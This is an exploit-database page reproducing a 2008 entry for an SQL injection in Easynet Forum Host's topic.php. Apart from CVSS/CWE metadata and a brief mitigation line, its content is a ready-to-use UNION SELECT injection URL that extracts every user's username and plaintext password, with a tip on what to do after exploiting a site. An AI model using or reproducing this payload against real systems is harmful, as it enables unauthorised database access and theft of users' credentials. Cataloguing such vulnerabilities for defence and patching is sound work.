header-logo
Suggest Exploit
vendor:
Forum Host
by:
Pr0T3cT10n
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Forum Host
Affected Version From: all
Affected Version To: all
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: all
2008

Easynet Forum Host (topic.php) SQL Injection Vulnerbility

Retrieve users username and plaintext password.

Mitigation:

Input validation and sanitization, use of prepared statements (parameterized queries), use of stored procedures, and use of least privilege when connecting to the database.
Source

Exploit-DB raw data:

# Exploit Title: Easynet Forum Host (topic.php) SQL Injection Vulnerbility
# Date: 05/04/2008
# Author: Pr0T3cT10n
# Software Link: http://www.easynet4u.com/forum
# Version: all
# Tested on: all
# CVE:
# Code:
//------------------------------------------------
// Easynet Forum Host SQL Injection Vulnerbility
//------------------------------------------------
// Discovered by: Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>
// Discovered on: 5 April 2008
// SCRIPT DOWNLOAD: N/A
//------------------------------------------------
// SCRIPT SITE: http://www.easynet4u.com/forum
//------------------------------------------------
// Description: retrive users username and plaintext password.
//------------------------------------------------
// NOTE / TIP: After you exploit the site please press CTRL+A :)
// EXPLOIT: http://www.server.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0
//------------------------------------------------